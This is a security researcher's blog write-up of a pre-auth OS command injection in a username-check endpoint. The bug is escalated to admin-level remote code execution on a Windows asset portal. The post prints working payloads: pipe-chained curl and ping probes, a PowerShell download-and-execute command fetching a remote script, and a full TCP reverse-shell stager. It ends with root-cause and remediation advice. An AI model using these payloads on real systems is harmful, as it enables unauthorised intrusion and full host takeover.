<!DOCTYPE html>
<html lang="en">

<head>

<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"/>

<title>
OS Command Injection to Remote Code Execution — thevillagehacker
</title>

<meta name="description"
content="OS command injection in a username existence check: OOB proof, PowerShell staging, and admin-level RCE on a Windows-hosted asset portal."/>

<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=JetBrains+Mono:wght@300;400;500;700&display=swap"
rel="stylesheet">

<link rel="stylesheet"
href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">

<link rel="stylesheet" href="../assets/css/style.css"/>

<style>

.hljs{
    background:#070b12 !important;
    color:#d6deeb !important;

    padding:22px !important;

    font-family:var(--font-mono) !important;
    font-size:13px !important;
    line-height:1.65 !important;

    border-radius:0 0 8px 8px;
}

.hljs-keyword{color:#c792ea !important;}
.hljs-string{color:#ecc48d !important;}
.hljs-title{color:#82aaff !important;}
.hljs-comment{color:#5c6773 !important;}
.hljs-number{color:#f78c6c !important;}
.hljs-built_in{color:#89ddff !important;}

pre{
    position:relative;
}

pre::before{

    content:'';

    display:block;

    height:38px;

    border-bottom:1px solid #1e2a38;

    background:
        radial-gradient(circle at 18px 19px,#ff5f56 0 4px,transparent 5px),
        radial-gradient(circle at 36px 19px,#ffbd2e 0 4px,transparent 5px),
        radial-gradient(circle at 54px 19px,#27c93f 0 4px,transparent 5px),
        linear-gradient(to bottom,#101722,#0c121c);

    border-radius:8px 8px 0 0;
}

</style>

</head>

<body class="has-site-fx post-page">

<nav class="top-nav landing-nav">
    <div class="nav-inner landing-nav-inner">
        <a href="/" class="nav-brand">
            <span class="nav-prompt">~/</span>thevillagehacker<span class="nav-path">/posts</span>
            <span class="status-dot" title="research post"></span>
        </a>
        <div class="nav-right">
            <span class="nav-clock" id="nav-clock" aria-hidden="true"></span>
            <a href="/" class="nav-link">Home</a>
            <a href="/blog.html" class="nav-link nav-link-active">Blog</a>
            <a href="https://thevillagehacker-security.gitbook.io/ctf-writeups" class="nav-link" target="_blank" rel="noopener">Writeups</a>
        </div>
    </div>
</nav>


<div class="advisory-banner">
    OS COMMAND INJECTION // POWERSHELL // REMOTE CODE EXECUTION
</div>

<div class="container">

<header class="header">

    <span class="cve-tag">
        WEB APPLICATION SECURITY
    </span>

    <h1>
        OS Command Injection to Remote Code Execution
    </h1>

    <p class="subtitle">
        PRE-AUTH SINK // OOB PROOF // ADMIN SHELL
    </p>

    <div class="meta">

        <div class="meta-item">
            <div class="label">researcher</div>
            <div class="value">Naveen Jagadeesan</div>
        </div>

        <div class="meta-item">
            <div class="label">published</div>
            <div class="value">2024-12-10</div>
        </div>

        <div class="meta-item">
            <div class="label">platform</div>
            <div class="value">Windows / Web Application</div>
        </div>

    </div>

</header>

<article>

<p>
Pre-auth username check. Boolean JSON response. nginx in front.
Somewhere behind that, Windows was concatenating the
<code>username</code> field into an OS command — almost certainly a
“does this account exist / is it provisioned” helper that should
have been a directory API call, not a shell.
</p>

<p>
This is the path from blind injection to a PowerShell reverse
shell running with administrative rights on an asset-management
portal.
</p>

<h2>Target</h2>

<p>
Centralized asset management web app: create and manage assets,
multiple login options (local password, Google SSO, GitHub SSO).
I spent time on the unauthenticated edges of login because those
endpoints are high traffic, often older, and rarely re-reviewed
when SSO gets bolted on.
</p>

<p>
Interesting call:
</p>

<pre><code class="language-text">POST /username_exists HTTP/1.1
Host: target.com
Cookie: session cookie: hello
User-Agent: Mozilla/5.0
Content-Type: application/json

{
    "username": "whoami"
}</code></pre>

<pre><code class="language-text">HTTP/1.1 200 OK
Server: nginx/1.22.1
Content-Type: text/html; charset=utf-8

{
    "success": false
}</code></pre>

<p>
Always a boolean-shaped answer. No stdout, no error text, no
timing you can trust on a single request. Classic blind /
semi-blind command injection territory: you prove execution
out-of-band, then escalate payload complexity.
</p>

<h2>Why username was a suspect</h2>

<p>
Identity checks sometimes shell out to legacy tools (domain
queries, local account utilities, custom provisioning scripts).
If the implementation is roughly
<code>exec("sometool " + username)</code> or a pipeline with bad
quoting, metacharacters in the JSON string become shell syntax.
</p>

<p>
I treated the field as a Windows cmdline injection surface
first (target fingerprint leaned Windows), while still trying
cross-platform OOB probes.
</p>

<h2>Proving execution without a reflection</h2>

<p>
OOB toolkit for this class of bug:
</p>

<ul>
<li>Time sinks (<code>ping</code> with count) when the request blocks
on the child process</li>
<li>HTTP callbacks (<code>curl</code> / <code>wget</code> / PowerShell
download) to an attacker-controlled host</li>
<li>DNS callbacks when HTTP egress is filtered (not required
here once HTTP worked)</li>
</ul>

<p>
Example probes that landed:
</p>

<pre><code class="language-text">|ping -c 5 127.0.0.1||

|curl https://thevillagehacker.com/exploit/file.txt||</code></pre>

<p>
Pipe / chaining style matched a shell that would run a second
command after or beside the intended tool. The <code>curl</code>
fetch hit my server — that is ground truth: the worker handling
<code>/username_exists</code> can initiate outbound HTTP and run
binaries from a payload in <code>username</code>.
</p>

<p>
At that stage severity is already critical. The rest is
operator access.
</p>

<h2>From callback to shell</h2>

<p>
Windows + confirmed egress ⇒ stage a PowerShell reverse shell
rather than fighting for interactive output in the HTTP
response. Hosted a script and triggered download-execute via
the same injection point:
</p>

<pre><code class="language-ps">|powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://thevillagehacker.com/mypowershell.ps1')"||</code></pre>

<p>
Stager contents (TCP reverse shell pattern; adjust host/port
per engagement):
</p>

<pre><code class="language-ps">$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 80);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    $sendback = (iex ". { $data } 2>&amp;1" | Out-String);
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte, 0, $sendbyte.Length);
    $stream.Flush()
};
$client.Close()</code></pre>

<p>
Callback connected. Process context on the box was administrative
— the web/app pool identity was over-privileged, which turned
“RCE as service account” into “RCE as admin” without a separate
local exploit.
</p>

<p>
Shell reference pattern adapted from common public snippets
(e.g. community gists such as
<a href="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3">egre55’s reverse shell examples</a>);
the novel part for the report is the sink, not the stager.
</p>

<h2>Impact</h2>

<ul>
<li>Unauthenticated (or pre-auth) remote code execution on the
application host</li>
<li>Full host compromise under an admin-level app identity</li>
<li>Read/modify application data, secrets on disk, further
credential material</li>
<li>Pivot potential into whatever that host could reach
(asset DB, internal APIs, domain resources)</li>
</ul>

<p>
For an asset portal, losing the server is losing the estate map.
</p>

<h2>Root cause</h2>

<ol>
<li><strong>OS command built from request JSON</strong> — username
passed into a shell or external process without a strict
allowlist of characters / fixed argv array.</li>
<li><strong>No output needed for abuse</strong> — boolean wrapper
hid errors but did not prevent side effects.</li>
<li><strong>Egress allowed</strong> from the app host to the
internet (or to attacker infrastructure reachable in the test).</li>
<li><strong>Service runs hot</strong> — application identity with
admin rights multiplies blast radius of any RCE.</li>
</ol>

<h2>Remediation</h2>

<ul>
<li>Delete the shell-out. Resolve usernames with proper APIs /
DB queries / IdP calls.</li>
<li>If an external binary is unavoidable, use argv arrays with
no shell, allowlist <code>^[A-Za-z0-9._-]+$</code> (or your real
username policy), and hard-fail on mismatch.</li>
<li>Run the app pool as a managed service account with least
privilege; no local admin for HTTP workers.</li>
<li>Egress filter default-deny; alert on unexpected child
processes under the w3wp/node/java worker.</li>
<li>Add regression tests: metacharacters in
<code>username_exists</code> must never spawn <code>cmd</code> /
<code>powershell</code>.</li>
</ul>

<h2>Closing</h2>

<p>
I still fuzz login-adjacent JSON with <code>|</code>,
<code>&amp;</code>, backticks, and newlines even when the UI only
allows “email format.” The response may stay
<code>{"success":false}</code> forever. Your callback server will
tell the truth.
</p>

</article>

<footer>

    <span class="footer-text">
        © 2026
        <a href="../index.html">thevillagehacker</a>
        — Naveen Jagadeesan
    </span>

    <span class="footer-text">
        status: active<span class="blink"></span>
    </span>

</footer>

</div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>

<script>
hljs.highlightAll();
</script>

    <script src="../assets/js/site.js" defer></script>
</body>
</html>